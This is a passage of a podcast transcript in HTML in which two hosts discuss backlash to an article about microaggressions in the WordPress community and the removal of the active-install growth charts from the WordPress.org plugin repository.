src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3a7.png\" alt=\"🎧\" class=\"wp-smiley\" /></p>\n\n\n\n<h1 id=\"h-transcript\">Transcript</h1>\n\n\n\n<p><strong>Dan Knauss:</strong> [00:00:00] Good morning Ny.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Good morning, Dan. How are you?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Okay. I think! We\'ve got quite a few things cover here, but I think today, the first — the first is probably a topic all onto itself. Something you could spend a lot of time on!</p>\n\n\n\n<p>I feel like I\'m in the role of like bringing, bringing someone to the family Thanksgiving dinner and having to explain like&#8230; Oh yeah, <em>Uncle</em>—</p>\n\n\n\n<p>They said <em>that</em>.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Oh yeah, So , I wrote an article at Master WP about microaggressions. Mm-hmm. . And you know, usually when I do my social commentary, I do tie it to tech. And I mean, the reason I wrote it was tie it to tech issue, Twilio and claims of reverse racism and hiring and [00:01:00] things like that. And affirm of action and.</p>\n\n\n\n<p>What I saw the conversation around this tech conversation was that, you know, a lot of microaggressions, which I talk about is like, you know, unconscious bias and basically racism. Um, so I was like, you know what, this seems like something that the community really needs to learn about and hear about. So, took my wonderful African American studies degree in research background, , and um, you know, did a good article on microaggressions.</p>\n\n\n\n<p>Mm-hmm. , which led to more microaggressions. That let this hate mail led to me taking a little break from Twitter. But, um, I guess that\'s addressing the elephant in the room. But I mean, I look at it as something as I still don\'t regret writing it. I don\'t regret what led up to writing it because we have a good number of people in the community who are very informed and they are very.</p>\n\n\n\n<p>You know, resp receptive to information like this. I got a [00:02:00] lot of support. I got more support than hate. Okay? So I want to do, I do wanna acknowledge that, but there are quite a few people in the community who actually, you know, they need this information and they ignore it. But you know, that\'s not going to stop me.</p>\n\n\n\n<p>And although I\'m taking a break from Twitter, you know, it\'s because, you know, I have a lot of other things going on. Um, yeah. So I\'m perfectly fine and I can\'t wait to get back on Twitter cuz I\'m really gonna argue. Yeah. I\'m ready to argue with people. , I\'m just kidding. But I, no, I do miss Twitter. It\'s.</p>\n\n\n\n<p>It\'s nice connecting with people of the community. Yeah. Be in a meaningful way. And like I said, there were lots of people who were like, you know, I really needed to hear this. Like, this actually changed my perspective. I think I might buy a book, one of the books you recommended, Things like that. So, Oh good.</p>\n\n\n\n<p>If I can help one person, like that\'s all, that\'s all I need. I don\'t need a, A group.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I think it was really good article. I, I haven\'t heard all of the, the stuff that you covered and you did have a, a bibliography at the end, so Yeah. Mm-hmm. , people [00:03:00] wanna read, click through and, and, and get into some more. Um, I thought it was pretty generous and even handed things.</p>\n\n\n\n<p>It\'s interesting people. Triggered about it because you were pretty clear that microaggressions are, are things almost anyone can do to anybody else for any number of of reasons. Um, but, um, I don\'t know. I\'m, I\'m always, I\'m surprised, not surprised at the kind of reactions that you, you get, um, when you touch these, these subjects.</p>\n\n\n\n<p>I know it\'s, it seems pretty much that women. are the, the targets of, of that when, when there\'s equity and inclusion and justice type subjects that come up. Um, and that kind of bothers me. We talked about that a bit before. Mm-hmm. , the kind of, what I wouldn\'t say it even approaches hate mail and we get the kind of angry I\'m leaving, [00:04:00] I\'m unsubscribing it, you know, you shouldn\'t talk about this stuff.</p>\n\n\n\n<p>It\'s always anonymous. Um, that comes to me. The, the stuff I\'ve seen, um, that post status gets, Um, I, I think your experience is quite a bit different and that kind of concerns me that, um, people getting, I think a, a pretty, even, even handed and calm, even like calmer than , a very tolerant response to. Some tough issues where there\'s, there\'s definitely kind of abusive things going on out out there.</p>\n\n\n\n<p>Um, the reaction is more of the same a as you said, directed very personally from people who are using their work accounts to do it. And they\'re not hiding their identity at all with you. I don\'t know what they\'re afraid of. They don\'t do that with, with us, but it [00:05:00] kind of, That doesn\'t speak to anything good if they feel confident.</p>\n\n\n\n<p>Um, just cutting loose on, on you, on, on women who write, um, something that they don\'t want to hear. And it is, it is exclusively men as far as I\'ve ever heard.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Yeah. Um, As, as you said, as we talked about people, as you saw on Twitter, people are writing from their Twitter accounts with their WordPress information in it.</p>\n\n\n\n<p>Yeah. They\'re sending it from their business address that. Their business, their business, email addresses that have their addresses and phone numbers and stuff. Mm-hmm. , that\'s what\'s, uh, . It\'s interesting to me because even if you, I, it\'s a disrespect thing, honestly. Let me, let me go back. They do it because it\'s, they know like, I can say this to you with my chest, and there\'s no repercussions.</p>\n\n\n\n<p>Or they think, they think that, right. And, um, it\'s a disrespect issue. It\'s always amusing to me. Going back a little further to what you said, you were like, you wrote it very like, you know, without emotion. Objectively, I\'ve, I\'ve seen a [00:06:00] lot of people say that. A lot of people said this to me. Mm-hmm. , they were like, this was written like a research paper.</p>\n\n\n\n<p>Yeah. Because, you know, one, it was. Two. The biggest thing that I want people to know is that I don\'t have the luxury of being able to be emotional in writings like this. When I write about my race and my gender or things that I have experienced, and the moment I show any sign of emotion, I\'m the wrong person.</p>\n\n\n\n<p>It doesn\'t matter what the other party did to me, right? Because there\'s this big, uh, I don\'t know what you would call it. It\'s this big theory with people discount your experiences and they say it\'s because you\'re emotional. It\'s because you\'re looking to be a victim like you in, like, I enjoy stuff like this.</p>\n\n\n\n<p>I don\'t enjoy racism or racist people. I prefer to pretend they don\'t exist. That if I could do that, that\'s what I would do. But, um, I just couldn\'t show emotion. And it\'s been a while since I\'ve written like that. Um, I\'ve been able to show emotion for a while, but I knew with this I couldn\'t. And you see with that, we still got hate mail</p>\n\n\n\n<p>So, uh, I got told I was being a victim of, I was like, Of what? [00:07:00] No response. I was like, What am I a victim of? I\'m like, I\'m, this is, I have. Micro aggress against people. I\'ve used ables language, you know, not knowing I\'ve said things, um, toward people that I didn\'t know was harmful. And it was important to me to unlearn that I don\'t care if I didn\'t do it on purpose.</p>\n\n\n\n<p>And I\'m like, Doesn\'t everyone feel like this? No, they just rather not be told that they\'re doing anything bad at all, ever, even if it\'s unintentional and even if it hurts people, but you know, that\'s them. But for everybody else who wants to learn, I\'m always here .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah, it\'s, uh, definitely worth checking out if, um, if you haven\'t seen it enough with this woke stuff and other racist speech you can unlearn, which I think is very inviting.</p>\n\n\n\n<p>Um, uh, and yeah, that, uh, it, it can be unlearned that\'s a, a positive. Um, yeah, I\'ve seen mail come in about that, complaining that we don\'t want to hear anymore [00:08:00] of this. Change your thinking, change your mind. Woke stuff. Too bad. Yeah, too bad. Uh, everyone who has that kind of reaction is just a voting for doubling down on, on bigotry or the idea that they have nothing to learn.</p>\n\n\n\n<p>Um, and yeah, I know, I think that\'s a pretty honest and good generous starting point that we\'re. There\'s, there\'s not really any way through life and relationships without stepping on people\'s toes, and sometimes intentional, sometimes unintentional. And if you don\'t learn from that, you\'re, you know, that\'s, uh, at some point it\'s not ignorance anymore, it\'s intentional damage you\'re doing.</p>\n\n\n\n<p>Um, but I\'m, I\'m glad you wrote it and I hope more, more people. Engage with it, read [00:09:00] it and think about, think about it. Um, I, I think, uh, it\'s a tough one. Cause you, you also tackled the myth of meritocracy, which will die hard in, in tech. Um, , you know, I, everyone\'s a victim who hasn\'t earned their way up or, you know, proven their worth or, or mm-hmm achieved something that I consider, you know, notorious. Yeah, that\'s, there\'s a lot, there\'s a lot more going on in here than I imagine people think who just dismiss it at the title. So that\'s, uh, it\'s definitely worth, worth going through. And honestly, it\'s not in my time. I, I don\'t think this is something we\'ve talked about a lot.</p>\n\n\n\n<p>I don\'t think it\'s come up, um, a ton in, in just let\'s talk about. Kind of, um mm-hmm. conversations. [00:10:00] Yeah. In reaction to bad events. Un unfortunately in problem individuals and, uh, conflicts that come up. So it\'s, it\'s worth, it\'s worth having that conversation as a running one. And I hope the, um, diversity inclusion, um, equity approach to.</p>\n\n\n\n<p>To the, to not just events, but um, to, um, to help people, um, look at each other and relate in general will. We\'ll make that more of just, this is, this is just normal, right? . There\'s, there\'s a lot of different cultures and perspectives and age groups represented in a large, large community like WordPress and having an open door and open conversation on it.</p>\n\n\n\n<p>It\'s good. Um, anything else you wanted to [00:11:00] get into? About that. I know there\'s, there\'s so many big things looming behind it, but yeah, you need some time to rest, recover, and.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Um, not many big things for me. Um, I just want people to, I, I was worried people were thinking, um, especially the first few days I was off Twitter that I was like somewhere crying. I\'m not,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Oh geez, , no.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> This man could not ever in a million years make me cry, baby. But , um, it has encouraged me to keep talking.</p>\n\n\n\n<p>Like, if, if the reception was a little more tame, , I definitely probably would\'ve said, You know what? Okay. People heard and they understood. The pushback has made me want to talk about it even more. Mm-hmm. , So I\'m, I\'m cooking up some things and we had Ally, uh, Neon\'s workshop on how to be an ally, which, um mm-hmm.</p>\n\n\n\n<p>talked a lot about microaggressions and a lot of things we were experiencing cuz Ally\'s been through the re, through the wrong. Is that the expression? Thank you.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Through the [00:12:00] ringer.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Through the ringer. Especially when you talk about, you know, racism in Europe and, you know, Yeah. You can\'t even talk about racism in Europe according to Twitter.</p>\n\n\n\n<p>So, um, and I\'m going to talk about it. So, and I\'m going to Word camp. I, I don\'t care if no one has Christmas, I\'m going to work Europe next year. But, um, Yeah, we\'re, we\'re gonna keep talking about it. I, I hope to see more workshops. I may do one I don\'t know yet. Um, I\'m gonna keep, I\'m gonna keep talking about it.</p>\n\n\n\n<p>If, like I said, if I\'m only reaching one person out of all the people that this goes out to, that\'s fine. Yeah. ?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. Good. No, um. I, I, I think, uh, anyone who thinks that you were off Twitter for any of those reasons is just out of , out of touch. No. Yeah. Pin pinned your flow foot to the floor with a steak knife.</p>\n\n\n\n<p>Got bigger. wasn\'t a steak knife, but was a Japanese, a big</p>\n\n\n\n<p><strong>Nyasha Green:</strong> shift [00:13:00] knife.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> The sword.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> It was a Santo chef knife. It was very sharp. I sharpen it every week. It was an, it was a beast. Let\'s, let\'s embellish this story. Oh. And then, Yeah. I don\'t, I know.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Jump me. I told you I don\'t, I don\'t want to talk about sharp needles, knives every, you know.</p>\n\n\n\n<p>Oh man, we won\'t, We\'ve been through that. I\'ve been upset when that happened. I was like, Oh, oh, oh,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> oh. But I just wanted it to be known. It was not a state knife I could have handled.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> No, it was huge. A state knife. Yeah. Yeah. It was. Uh, well, I, I hope that that recovery. Goes really well and admire your, your spirit, but it, it is good to get off.</p>\n\n\n\n<p>It is good to get off of the social media and I\'m glad for the supports you\'ve got and the team that is always seems to be a hundred percent behind you and is good with disagreement and, and some amount of, of [00:14:00] tussle and stuff. And, and that\'s. That\'s probably a good move in a good way to move into the, the bigger, the bigger topic in most people\'s minds for this week.</p>\n\n\n\n<p>But, um, yeah. Um, I, I really think the macro microaggression and how people teach, uh, how, how they treat each other. . Um, it\'s just a huge thing on onto itself and it really affects, it impacts trust and I think that\'s the theme, the theme here. And it\'s, it\'s always one in open source and in communities and in relationships.</p>\n\n\n\n<p>How, how healthy is our level of trust? Um, For each other. And this, uh, this active install growth chart issue going away has certainly touched a lot of people\'s nerves and confidence or, or trust for, um, their relationship with.org and how things work there. [00:15:00] Have, have you, uh, what are, what are your, what are your thoughts on that?</p>\n\n\n\n<p>It\'s, I guess nothing\'s really changed in a week as far as I can tell this morning.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> That\'s a spicy topic. I don\'t know. I don\'t wanna say the wrong thing. I\'m just kidding. You know? Nah. Um, , no. Um, that was a very interesting topic. Um, I have not jumped a lot into plugin developing. Plugin development. I\'ve wanted to, that\'s something I have on my to-do list for the future.</p>\n\n\n\n<p>Um, there\'s so many different aspects of WordPress I want to kind of jump into cuz it\'s very interesting. I don\'t, and I\'m, I\'m being honest, like I don\'t really know how to feel because I\'ve seen both sides of it. Um, you sent me some good information. We had a very good article. Um, I don\'t wanna Bri pronounce his name.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Mark Zara. Mark. He\'s a great guy. He\'s, um,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> he is, he is awesome. Um, he had a article by him. Oh, go ahead.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Oh yeah, he, he brought [00:16:00] it to everyone\'s attention first, I believe. Um, yeah, so for those. Have been under rock or, or new to all this , I think it was late Thursday night, um, a week ago. Um, uh, uh, someone who works for, for Audrey Capital, um mm-hmm.</p>\n\n\n\n<p>So you would assume like directly. Responding to, to something Matt had re requested, took down the, uh, re reverted the changes in an old track ticket that in 2017, introduced the active install charts that are in the advanced section on plugins, um, in the WordPress DO org plugin repository. So, Plugin owners and really everyone can go in there and see a somewhat obscured, rough estimate of, um, how many sites appear to have your plugin installed on it at the, within the last 24 hours and.[00:17:00]</p>\n\n\n\n<p>And then over time, how that needle moves. Is it, is it going up or down? And, and if there\'s a, a growth or decline trend, what\'s that line averaging out to? So that\'s been there for a while and, and people really, a lot of people have really relied onto it. And that just went away with a ticket that just said it\'s insufficiently obfuscated data.</p>\n\n\n\n<p>So clearly there\'s, there\'s sort of an implication and then further things, there\'s definitely a security issue. The attempt to put out, to make some data public and not all of. Um, completely exact and comprehensive and available to everyone. That wasn\'t the attention, but some, some entity, um, with the capacity or more.</p>\n\n\n\n<p>I know a lot, there\'s a lot of services and people who scrape that, who pull that data in some way. Um, To get a fix on the market, on to offer it as a service to look at other, [00:18:00] your plugins, your competitors, how things are going. Um, that was just pulled and there\'s co, the, the primary code involved, um, is not public, is not out in the open, and it\'s what would be receiving the, the pings from all the sites and interpreting them.</p>\n\n\n\n<p>As, Okay, does this count as a live site? If so, score one and then making that available through some kind of API where you can pull, um, pull out your current active installs. That too, that\'s the part that apparently has a security privacy issue and needs attention and, um, that has not been formally, officially.</p>\n\n\n\n<p>Clearly publicly stated, there\'s a discussion in meta slack, uh, mechan and WordPress slack, where this, you know, if you wanna read through, read between the lines and [00:19:00] people unofficially, but who I think are, uh, uh, totally trustworthy and, and know enough about what\'s going on. You can figure out what\'s happened.</p>\n\n\n\n<p>And that\'s the article I put together. Uh, trying to take that as at face value. Um, that appears to be what\'s gone on. And you see the, the reaction if you were a plugin owner. In the,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I wanna pause on something you said. You said, Well, if you know that these people are reliable, the right people are telling you the right things.</p>\n\n\n\n<p>What if you\'re a newbie like me right to this and you don\'t know these people not saying they\'re not true. Exactly. I don\'t, You know, I, I.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> My thought, Who is Triple J? Why should we trust him?</p>\n\n\n\n<p><strong>Nyasha Green:</strong> No, I wouldn\'t say that. I\'m just like, I\'m going off what you\'re saying. You\'re like, Well, these are the right people.</p>\n\n\n\n<p>And I\'m like, Well, you know that. How would I know that? You know? Yeah. That\'s me not playing devil\'s advocate. Cause I think that\'s stupid, but I, that\'s me just like waiting in, like I, I don\'t really [00:20:00] personally know these people. I, I get. , I get the side, I get both sides. Again, because one, I, I looked at it when I was deciding on plugins that I didn\'t really have a lot of information a on because, you know, the more people that seemed to be using it mm-hmm.</p>\n\n\n\n<p>the more reliable it seemed. And so, I mean, I definitely get that as a consumer. I\'m definitely like, Okay, I\'m gonna do a little bit more research and, you know, I\'m lazy. So, you know, that\'s on me, that\'s on them, that\'s on me. But I, I get where plugin owners are panicking over that. Like, it\'s, it\'s their money, it\'s their business.</p>\n\n\n\n<p>Like I, I get that. And then like, it does not seem to be a lot of clarity on it. Like especially when it went down, like it just went down like, ugh, you know, we need to fix this. Mm-hmm. . And it was kind of like, that\'s it. And it. , Right? What can we get an explanation? And it\'s like they have to dig, dig, dig.</p>\n\n\n\n<p>And I\'m, I know speculation is bad in general, especially when you don\'t have all the facts. Um, so I know there\'s been a lot of speculation on what\'s really going on and why it was really taken down, you know, outside of the few statements we got. But [00:21:00] do you blame them? Can you blame them? Like, if you\'re in the dark, all you can do is guess, I guess.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. And that\'s not helpful from the, from the, um, from a normal corporate communications or community management standpoint. Mm-hmm. not having, not having an internal PR arm, not having some means of, of communicating to stakeholders in ways that calm things and, and spread correct information. Um, is it just.</p>\n\n\n\n<p>Who does that? So I think a lot, a lot of people feel disrespected, but this isn\'t a new thing. Um, they should know that it\'s, it\'s that way. It\'s been that way for a while and I would assume it\'s wanted to be that way. Um, but if, if you were expecting or wanting something a little more standard, that is not, not the [00:22:00] case.</p>\n\n\n\n<p>And it does lead to people getting wound up. Speculating wildly and, and, uh, with distrust, uh, is spreading a good deal with distrust. And I think that\'s, that\'s what people are going to do every time.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I mean, and I\'m, I\'m with you on that. It\'s been this way for a long time, so people are pretty much, um, You know, a lot of people pretty much expect it.</p>\n\n\n\n<p>So they\'re like, Well, you know, these things happen. That\'s one way to look at it, but I would like to quote the Great American Television Show The Wire. Oh yeah. And say the thing about the old days. Is they The old days, ,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Was that bunk who said that? I think</p>\n\n\n\n<p><strong>Nyasha Green:</strong> he did. Yeah. It wasn\'t, Yeah. So, um, This is the thing, like, again, me just looking at this from my perspective as a newer person, if I\'m, if I don\'t know to expect these things, how can I expect them?</p>\n\n\n\n<p>Right? Like, that\'s a lot, a lot of things happen in community, even outside of this, where it\'s like, well, that\'s how things have been done. And it\'s like mm-hmm. . [00:23:00] Yep. What am I supposed to do? , Like, I, I, Okay. Like I have to, There\'s no onboarding to how things are done. We\'ve talked about,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> That\'s a big issue.</p>\n\n\n\n<p>This is your onboarding.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Yeah. So it\'s like, Trial by baptism. Trial by fire. Yeah, that\'s what I mean. But you know, and I know some people, some people who are still having these conversations, they\'ve been in the community and they\'re used to this, but I mean, it could be, they could be tired of it. They could want change.</p>\n\n\n\n<p>But I, I do agree with you saying like it\'s, it\'s gonna spread a lot of disinformation. No, you didn\'t say disinformation. It\'s gonna spread a lot of disagreement and we really don\'t need that. At all. You know what hashtag WP Drama. Um, but I mean, people also need answers. It\'s like I don\'t have a clear answer for what they should do because when I\'m confused and I feel like I\'m in the dark and nobody\'s giving me answers, I\'m definitely going to complain.</p>\n\n\n\n<p>And sometimes when you complain, it turns into hashtag WP Drama .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Oh yeah. That\'s almost inevitable. And so seeing it both ways, [00:24:00] Um, it, it shouldn\'t be Mark coming into Post Slack and in Twitter and saying, Hey, did anyone notice this ticket that just kind of crept in there and late Thursday night and, Hey, look, this chart\'s gone.</p>\n\n\n\n<p>Um, that\'s. At once, kind of highly irregular. But then again, is it, is it really to me for this, for this family?</p>\n\n\n\n<p><strong>Nyasha Green:</strong> To this family, I guess not like I\'m the, I\'m the, the, the daughter-in-law, I guess I\'m married into this family. Yeah. I\'m at Thanksgiving. Like, Huh, ?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> No, I feel like, yeah. Well, sorry you married into the mob.</p>\n\n\n\n<p>Um, . I apologize for uncle over here. . Um, well, yeah, I, I think trying, I always try to see things multiple ways and, and look for what\'s the most. [00:25:00] Most productive way forward that will align the most people in a understand productive way And what can be learned here? Um, I, I\'m willing to, because John James Jacoby stepped in and is a real long timer and is on the Medi and the ME team\'s a bunch of.</p>\n\n\n\n<p>Good people. Mm-hmm. who, um, were not apparently in the decision making about this, but have some degree of knowledge and oversight or independent, um, takes on. On the non-public code in question and have made it, and I see no reason to, to distrust any of that. So what, what has come out short of it? Not a press release, not something on even the taverns not, you know, being, being quite critical and not not getting any special, um, quotes from.</p>\n\n\n\n<p>Inside explaining this, um, what we\'ve got is what\'s come out on the, on the [00:26:00] ticket and it, they\'re saying it\'s a security issue that the either privacy, security, the, the way the data, um, was being pulled and used was over line that they were. Not willing to tolerate going on, and they want to change how that data access works.</p>\n\n\n\n<p>And I also trust them that it\'s gonna come back at some point. But what\'s muddied the waters is Matt has, um, disregarded the um, The desire for the, the, the crowd that calling for like a full explanation and, and just kind of leading it going forward with the discussion of, well, what is this data that you want?</p>\n\n\n\n<p>Um, what would, what helps the most? Um, and trying to kind of move things i I, in this direction of competition, how do we promote cooperative competition, Cooper competition, Um,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> ooh, let\'s make that [00:27:00] a word. .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> So it\'s a tough pivot to not to say, Hey, don\'t, let\'s not give you any kind of, we can\'t give you any full, There\'s not even official statement saying, We can\'t officially disclose what\'s going on here, but we\'re trying to remedy it in the meantime.</p>\n\n\n\n<p>Um, There\'s a couple of paths, how this could come back and how it could look, what\'s your feedback and input on that. Um, that\'s kind of what\'s being attempted, but the room temperature isn\'t really conducive to the most, um, helpful feedbacks, but just for me, just in watching, I\'m, I\'m, I haven\'t seen a lot of people explain why that one number is so important the way they think it.</p>\n\n\n\n<p>Um, and it makes me think like if you\'re that fixed on this thing, that could come and go, that wasn\'t there before. And none of the really big businesses are, [00:28:00] um, they\'re, they\'re not living and dying by this, and I\'m not sure anyone really is, you know, eggs all in one basket. Like really, Um, this is a, a wake up call I would think that if, if that\'s how you\'re running your business or you, you think it works that way, maybe you need some other.</p>\n\n\n\n<p>Other ways to analyze your success or, or, um, decline in with your customers.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Okay. I, I can\'t agree with you there, , but can I cannot, can\'t, cannot. I cannot.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Oh. Oh, really? What do you, what what, I mean, what about it?</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Like you said, that\'s, that\'s all fine and dandy for the bigger corporations, but for the smaller person, it\'s like, Whatever, Figure it out.</p>\n\n\n\n<p>Find another method. Oh, well I, again, you said this is how it\'s been done, but it\'s like, how many times can you do that to people? Honestly, [00:29:00]</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I, Yeah, I think that\'s a separate thing, right? If you kind of put that aside, this isn\'t a great way to, this isn\'t a great way to handle a community. Um, it\'s not a great way to handle business community.</p>\n\n\n\n<p>Um, It is what it is. It\'s happening. We put that aside. That\'s happening. Why do, why do you, you know, even if this hadn\'t happened, why is that? People saying that they go to that chart multiple times every. It only updates every 24 hours. And like the, the, it\'s general, it\'s kind of shotgun analysis. So I would say like maybe a week\'s worth of data would give you, it\'s just kind of a thumbs up, thumbs down on what, on install activity.</p>\n\n\n\n<p>And that\'s, that\'s for your free plugin. So if you\'re trying to make, um, if you\'re, your revenue stream is coming elsewhere from a premium product or, or something else, um, this is just people who are trying you out or using. The free [00:30:00] version and it\'s, it\'s just a general pool of, um, not, um, Well actually you can, you couldn\'t, um, you may, it may include, I guess it would include both, but once you have paying customers, I would pay attention to them.</p>\n\n\n\n<p>You have direct, you have a bit more direct, um, access to them and focus groups. There\'s a lot of things you could, you could do to, um, to get better. Data on how your, your product\'s being used and there\'s other ways to distribute.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> You don\'t think that would be a lot on smaller business owners, people, you know?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Sure. It\'s a lot. Um, and I, it\'s always kind of surprised me though, how, um, how. There\'s, there\'s just, Well, you know, everyone wants an easy, an easy way forward, But does that really, does that really substitute for, um, real business intelligence, for real customer [00:31:00] feedback from real contact and relationships?</p>\n\n\n\n<p>Um, the people I\'ve seen who seem to effectively build a, um, a small plug-in business who in intentionally are, you know, they\'re not trying to build. Thing at scale. They\'re, they\'re trying to do a company of one. Um, they promote it from the beginning on their, on their own channels. They know more or less who they\'re talking to.</p>\n\n\n\n<p>They\'re soliciting feedback. Maybe they have the, the code on GitHub, um, or wherever it is. They\'re engaged with a lot of people using it. I just, I don\'t see why a single measure as vague as that one is. Such, such an obsessed over, um, detail. I mean, I, I understand, I hear what people are saying about it. I get that mm-hmm.</p>\n\n\n\n<p>but it, when you actually literally analyze it as like, is, does that make good business sense? I haven\'t, I haven\'t seen that. [00:32:00] The only, the only good one is, and I think it\'s, it\'s kind of a painful scene, but, um, Matt said about this, the same thing people. See it as a thumbs up if they see it going up, it\'s a motivation to keep working.</p>\n\n\n\n<p>It\'s like, okay, that\'s valid. Like that. That\'s good feedback to give. Um, but what, there are all these other reasons people talk about why this is a, an important business metric to them. And I just, I think almost all of those are highly, highly questionable or at least, you know, you could probably get better information Another.</p>\n\n\n\n<p>And the</p>\n\n\n\n<p><strong>Nyasha Green:</strong> independent, like, so I, I\'ve never ran a plug-in business. I don\'t know if you have, you have a lot more experience than me. So, I mean, well we aren\'t we just speculating on what they can do. Like, you know, I, I trust Mark, Mark said that was one of the only tools they had, so it\'s going to make it a lot more difficult.</p>\n\n\n\n<p>I mean, like, I think that\'s worthy of them [00:33:00] complaining. I think if that was their only tool, like I, I don\'t know. I can\'t, I can\'t like jump in and say, Well they can do this, they could do that. They could go do this cuz I don\'t know.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Well, but it\'s their, It\'s their only tool. Cause they\'ve allowed that.</p>\n\n\n\n<p>They\'ve allowed that relationship to exist.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> So it was the easiest. And they like just kind of, I. It\'s, it\'s the easiest tool. So they kind of, it was easier for them to latch onto that instead of doing like alternate things, which they can do now. Is that what you saying? If it\'s,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> yeah, if it\'s really true that, that you put your, your business in the hands of a freemium type of product and the free versions in the repo, and this is the only measure you have of, of your potential market size.</p>\n\n\n\n<p>That\'s choices you made. I, I . I mean, there are a lot of other, And you went in someone\'s house and, and this was here once and, and some years ago it wasn\'t there. And, um, I, I understand why that, that feels like a, a breach of trust. [00:34:00] But no one ever had a contractor understanding. To the other one, to anything different that this is, that they have a right to this.</p>\n\n\n\n<p>Um, I,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> uh, I think the analogy is, you know, you went into someone\'s house and they said, Hey, it\'s an open. And you can use this thing right here. And they\'re like, Okay. And they use it for years and then they walk into the house one day and it\'s gone. And the person\'s like, Well, it\'s gone. Oh, well tell me why you needed it.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Well, it wasn\'t quite that, It was more like someone, someone\'s been coming in the back door in the kitchen and they took the beer cooler.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Yeah. Someone else has been like sneaking in and doing bad stuff and now everybody, we can\'t pay forward.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> We gotta go to the, Yeah, we gotta shut this down and, and go and address this.</p>\n\n\n\n<p>And,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> but there was no communication on that. I found out about the, the communication is cut that through somebody.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> There\'s, there\'s two levels. If you look at it, there\'s a, there\'s a much higher level thing here with how much bigger entities are using this data. Mm-hmm. and potentially abusing it, and the need to get everyone on the same page, and [00:35:00] everyone has the same data and even has the ability to hide it.</p>\n\n\n\n<p>If you don\'t want your business exposed or your dad exposed that maybe that you can, you can put a privacy control on it. Mm-hmm. , but the, the rank and file the small. Smaller business entities that are upset because they\'ve really been relying on this. Um, totally understand that. But it, it does raise questions of why you have that level of dependency and does this number really do all that for you?</p>\n\n\n\n<p>Is your business truly going to, to tank or suffer in some way with without this and could having it taken away, whether are your options, do you. Are there any kind of creative ways forward then? Um, I, I would think that there, there are, having watched that space enough and how different businesses operate partly in using the repo, not using it, um, and how they do their marketing, how they do their relationship with their [00:36:00] customers.</p>\n\n\n\n<p>Um, I, I think it. It\'s something that matters a lot to people, like you\'re saying, who are, who are small and maybe don\'t have the capacity, um, or it\'s a part-time thing or a side part project. Mm-hmm. , and they\'re leaning heavily on this rather than other things that maybe they don\'t have time to be doing.</p>\n\n\n\n<p>But it raises questions about what\'s ineffective, um, business model, what, what\'s good data and how do you get it? And, I think that there\'s, from above, there\'s a bit of an attempt to push that question on that part of the business community. And I don\'t know if that\'s an effective way to do it, but it doesn\'t seem</p>\n\n\n\n<p>It\'s not nice, it doesn\'t build trust. Uh, but I don\'t know, I don\'t know given enough, uh, pain points maybe. I don\'t know. We\'ll see where. Where it goes and the people caught in between on it, I, I feel for them. But, um mm-hmm. , [00:37:00] I don\'t have any, any reason to, to distrust those who have tried to be mediators and I, I think they\'re, I\'m glad they\'re, they\'re there putting, putting in their 2 cents.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I feel bad that they\'ve had to be mediators. This is a, a lot to push on someone. It is, but I am interested to see where this goes. And I\'m glad people are talking about it. I, I, I know communication is a bit as of a doozy sometimes, but I\'m glad people are talking about it. Um, I\'m, I think we need to revisit it.</p>\n\n\n\n<p>Listen, visit this cuz what if it just blows over?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I don\'t think it\'ll blow over. I, I think it\'s, I don\'t, I don\'t either. It\'s like a watershed,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I don\'t think at all. . Yeah. But I\'m interested to see where it goes. ,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> but it, there is, there is some sense of, um, a desire to redefine that part of the ecosystem, that culture there.</p>\n\n\n\n<p>Yeah. Definitely not wanting a [00:38:00] leaderboard of winners and losers or top 10 or something like that, but have some kind of helpful metric that motivates people that, um, is useful to them and isn\'t something that can be gamed and that someone higher up isn\'t pulling out and trying to figure out how can we game these stats or.</p>\n\n\n\n<p>Aggregate enough of this to, I don\'t know, build an even bigger secondary market for plugins, like a Zillow 